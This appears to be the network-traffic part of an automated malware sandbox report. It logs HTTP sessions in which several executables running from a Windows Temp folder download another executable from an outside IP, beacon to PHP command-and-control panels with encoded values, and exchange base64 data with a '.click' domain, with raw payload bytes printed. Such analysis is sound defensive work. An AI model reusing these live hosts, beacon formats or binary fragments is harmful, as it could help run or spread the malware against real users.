                                                                                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:41.936485052 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:41 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              83192.168.2.450178185.215.113.16807012C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:42.039053917 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:43.359494925 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:42 GMT
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Content-Length: 2809344
                                                                                                                                                                                                                                                              Last-Modified: Sun, 22 Dec 2024 00:17:01 GMT
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              ETag: "67675a7d-2ade00"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2b 00 00 04 00 00 d9 47 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$ + `@ `+G+`Ui`D @ @ @.rsrcD``@.idata f@osxguznn`*P*h@nksckbfu +*@.taggant@ +"*@
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:43.359586954 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:43.359661102 CET448INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:43.359698057 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:43.359733105 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:43.359767914 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:43.359803915 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:43.360126019 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:43.360301018 CET1236INData Raw: fd 59 fb 90 ff 37 19 27 59 ac 03 27 59 ad df 7a 59 88 29 27 53 37 df 27 59 37 df 27 59 f1 3d 27 56 9b df 27 5c 92 0f 24 59 21 e1 27 59 37 df 27 59 8f f3 26 59 b1 17 7a 59 37 fd 8e 4f 37 df 31 31 a6 df 27 57 bd 2c 27 59 c7 17 77 59 37 fd 94 94 37
                                                                                                                                                                                                                                                              Data Ascii: Y7'Y'YzY)'S7'Y7'Y='V'\$Y!'Y7'Y&YzY7O711'W,'YwY77k'i&YvY77k'i8&YvY7k]'i8&YvY7k'i8&YvY7k}'i8&YvY7k'i8&YvY7k&i8&YvY7k&i8&YvY7
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:43.360336065 CET1236INData Raw: 5c e1 5f db 5c 96 e0 c1 d9 6c fa 87 5c b1 fd 8c 55 a7 e0 c1 d9 c3 df 84 5c e1 5f 3d 5b 8a e0 c1 d9 11 e1 84 5c e1 5f 95 56 8a e0 c1 d9 84 fa 83 5c e1 5f f1 56 8a e0 c1 d9 cc e1 84 5c e1 5f a6 5c 8a e0 c1 d9 d2 e0 84 5c e1 5f 8c 5b 8a e0 c1 d9 09
                                                                                                                                                                                                                                                              Data Ascii: \_\l\U\_=[\_V\_V\_\\_[\U\_r\&\_\\_5\\_\9\_+\\_Y\_I\&YWy\W&Yy\=X&YOy\PN&YYy\&Y7A0Y97'Y1U
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:43.479669094 CET1236INData Raw: 59 2d e1 59 59 9a df ac 5c 89 df 7c 59 05 e1 59 59 8a df d4 5c 89 df 8c 59 f6 e0 59 59 7a df e8 5c 89 df 5c 59 f6 e0 59 59 ea df d4 5c 89 df 6c 59 70 e1 59 59 da df e8 5c 89 df bc 59 f6 e0 59 59 ca df 4a 5b 89 df cc 59 ae e1 59 59 ba df 73 5b ea
                                                                                                                                                                                                                                                              Data Ascii: Y-YY\|YYY\YYYz\\YYY\lYpYY\YYYJ[YYYs[YdYZYYZYD\"ZY\"ZY$YYYXYY`YY R'\&T1\X'\T'\X2\xU%\Y'\:X'\V'\Q#7


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              84192.168.2.450179185.156.73.23805548C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:42.604021072 CET395OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                              User-Agent: C
                                                                                                                                                                                                                                                              Host: 185.156.73.23
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:43.922427893 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:43 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 1
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 30
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              85192.168.2.450181212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:43.940793037 CET312OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33
                                                                                                                                                                                                                                                              Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:45.247055054 CET154INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:45 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 7
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c><d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              86192.168.2.450182185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:43.941020012 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:45.263942957 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:45 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              87192.168.2.450190185.156.73.23805548C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:46.340518951 CET395OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                              User-Agent: C
                                                                                                                                                                                                                                                              Host: 185.156.73.23
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:47.544327021 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:47 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 1
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 30
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              88192.168.2.450191185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:47.377547026 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              89192.168.2.450192212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:47.524837017 CET160OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              0192.168.2.449806172.67.209.2024437820C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:16:29 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                                                                                                                              2024-12-22 01:16:29 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                                                                              2024-12-22 01:16:29 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:29 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=4jjlu1kfrsceanfcqsdk025m76; expires=Wed, 16 Apr 2025 19:03:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mdxlW%2BS%2BddZHKIibNcR3jFwfeCFRR2nhv3qNd%2Bgmaedx2nHU8bVOgxLuApZBu0grYd4lwV91LNnaJ0dWS%2BIJKkZnUopmGZBrZAwf%2FcK4SBx%2Bf56IVd9xZdoyKTYLDnURPeXgemAE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c444bafd043af-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2217&min_rtt=2195&rtt_var=867&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=910&delivery_rate=1230509&cwnd=230&unsent_bytes=0&cid=74591629c901093a&ts=762&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:16:29 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                                                                                              2024-12-22 01:16:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              1192.168.2.449814172.67.209.2024437820C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:16:31 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 46
                                                                                                                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                                                                                                                              2024-12-22 01:16:31 UTC46OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d
                                                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=FATE99--test&j=
                                                                                                                                                                                                                                                              2024-12-22 01:16:32 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:32 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=p499ha4rssehb5vae9dt813ad5; expires=Wed, 16 Apr 2025 19:03:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JYmer%2BGrD3sDwtBCrFfm%2FrIoKVyYZwLZbbnSWShNDsKgsjHQ0zdu4xAbsz6PT1lz%2BvDKRRhH6kkNKJ4etdfBJnlLU8ekGdHDcIYofO7BcqiZrN7ZB6d2DJhHRYfFB01FmzasHjb9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c445b3a06c411-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1487&rtt_var=568&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=949&delivery_rate=1907250&cwnd=224&unsent_bytes=0&cid=02058663a3d7d1bb&ts=783&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:16:32 UTC244INData Raw: 63 35 30 0d 0a 6f 73 50 42 68 5a 6d 50 51 71 66 56 46 36 43 37 75 31 61 42 52 6a 6d 77 35 46 4c 51 5a 69 62 4c 78 6d 4b 6f 4d 63 56 66 54 4f 58 5a 34 62 65 6e 6f 37 74 75 68 61 5a 79 67 6f 48 50 4a 50 51 6a 46 5a 4b 46 4e 76 4a 63 51 4b 71 71 45 63 30 64 35 79 6b 68 78 35 69 6c 6f 4f 6e 71 36 6d 36 46 73 47 2b 43 67 65 41 74 6f 79 4e 58 6b 74 35 77 74 51 78 45 71 71 6f 41 79 56 71 71 4c 79 43 47 79 71 2b 6d 37 66 7a 73 4a 73 61 35 65 73 58 65 33 6a 66 72 4b 46 44 64 6a 44 2f 79 53 67 53 75 76 45 43 53 45 34 67 36 4f 49 54 76 6f 72 4c 75 75 2f 4a 75 33 50 64 79 7a 70 6d 42 64 4f 41 6a 57 39 79 43 4e 72 73 4f 54 71 4f 69 41 63 78 62 74 54 59 71 6a 63 71 68 70 65 7a 32 35 54 4c 4c 73 33 33 4f 32 4e 51 33 6f 32 6f 62 31 5a 35
                                                                                                                                                                                                                                                              Data Ascii: c50osPBhZmPQqfVF6C7u1aBRjmw5FLQZibLxmKoMcVfTOXZ4beno7tuhaZygoHPJPQjFZKFNvJcQKqqEc0d5ykhx5iloOnq6m6FsG+CgeAtoyNXkt5wtQxEqqoAyVqqLyCGyq+m7fzsJsa5esXe3jfrKFDdjD/ySgSuvECSE4g6OITvorLuu/Ju3PdyzpmBdOAjW9yCNrsOTqOiAcxbtTYqjcqhpez25TLLs33O2NQ3o2ob1Z5
                                                                                                                                                                                                                                                              2024-12-22 01:16:32 UTC1369INData Raw: 77 36 6b 51 58 6d 36 63 52 32 30 61 71 4c 53 6a 48 33 2b 2b 36 70 2f 7a 68 59 4a 33 33 66 63 37 58 33 44 66 73 49 31 72 53 6c 44 2b 79 42 30 79 68 6f 41 72 46 58 4b 67 7a 4a 49 44 49 71 4b 54 6f 2f 4f 55 6d 79 72 51 31 6a 4a 6e 65 4c 4b 4e 38 47 2f 4b 57 4d 37 45 51 53 62 6a 6b 48 34 52 4b 35 7a 6f 69 78 35 6a 68 70 65 6e 36 34 43 44 58 76 33 37 4a 33 4d 73 2f 36 69 6c 57 30 6f 73 36 76 51 64 45 72 71 34 4b 78 56 6d 6a 4d 43 4f 42 77 4b 48 6a 71 62 76 71 4f 49 58 76 4e 65 48 63 79 54 50 76 4d 68 6e 6f 78 69 2f 38 48 51 53 75 71 45 43 53 45 36 38 34 4c 59 54 4c 72 71 44 76 38 50 38 67 31 37 46 34 78 38 76 66 4d 65 30 75 57 4d 43 4d 50 72 51 48 54 61 4b 74 42 63 31 58 35 33 4e 75 67 4e 6a 68 2b 36 66 61 34 43 76 4a 76 57 4c 43 6d 63 5a 36 2b 6d 52 63 33 73
                                                                                                                                                                                                                                                              Data Ascii: w6kQXm6cR20aqLSjH3++6p/zhYJ33fc7X3DfsI1rSlD+yB0yhoArFXKgzJIDIqKTo/OUmyrQ1jJneLKN8G/KWM7EQSbjkH4RK5zoix5jhpen64CDXv37J3Ms/6ilW0os6vQdErq4KxVmjMCOBwKHjqbvqOIXvNeHcyTPvMhnoxi/8HQSuqECSE684LYTLrqDv8P8g17F4x8vfMe0uWMCMPrQHTaKtBc1X53NugNjh+6fa4CvJvWLCmcZ6+mRc3s
